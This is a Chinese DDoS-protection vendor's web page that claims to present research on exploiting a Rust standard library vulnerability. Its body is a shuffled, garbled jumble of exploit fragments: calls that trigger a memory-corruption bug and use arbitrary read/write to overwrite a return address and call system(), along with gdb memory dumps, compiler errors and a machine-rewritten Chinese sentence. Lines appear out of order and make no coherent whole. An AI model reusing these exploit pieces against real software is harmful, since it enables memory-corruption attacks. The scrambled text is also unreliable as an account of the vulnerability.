Rust标准库漏洞从DDoS防御分析到漏洞利用研究-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!
QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防护 > Rust标准库漏洞从DDoS防御分析到漏洞利用研究

Rust标准库漏洞从DDoS防御分析到漏洞利用研究

小墨安全管家 2020-10-14 12:27 CC防护 89 ℃
DDoS防御

 

thread 0x1: allocate chunk @ 0x7f3e39200000, size 0x100000000 

thread 0x1: allocate chunk @ 0x7f3339200000, size 0x100000000 

        target_idx:     the actual index of the target_vec, so I can do allocs[idx][0][0] for arbitrary RW 

· dlsym(NULL,“system”)

fn trigger_vulnerability(size : usize) { 

假如攻击者具有任意的读/写原语,这么谨防者差不多上无能为力,由于内存损坏漏洞总是能够构造这些原语,导致我能够以最可靠的方式利用漏洞。

 

Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1"

pub fn insert(&mut self, index: usize, element: T) { 

                // `index`th element into two consecutive places.) 

 (gdb) x/2i $rip 

    let (tx, rx) = channel(); 

    } 

fn main() { 

    // find target vector 

    do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, SYSTEM, 0x006d6574737973); 

error: Could not compile `exploit`. 

    allocs[target_idx][0][0] = value; 

    do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, SYSTEM, 0x006d6574737973); 

基本能够触发通配符漏洞,我的利用是在64位程序上举行的,当我利用这种内存破坏漏洞时,我需要搞知道几个重要的咨询题:

    println!("[*scan*]\tstart checking vectors"); 

 rcx            0x4141414141414141       4702111234474983745 

    do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*2, 0);    // handle = NULL

*/ 

    } 

        let mut val = do_relative_read(allocs, corrupted_vec, target_vec, target_idx, addr, i); 

0x7ffffe400000: 0x4141414141414141      0x4141414141414141 

To learn more, run the command again with --verbose. 

            break; 


DDoS防御

当前位置:主页 > CC防护 > Rust标准库漏洞从DDoS防御分析到漏洞利用研究

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119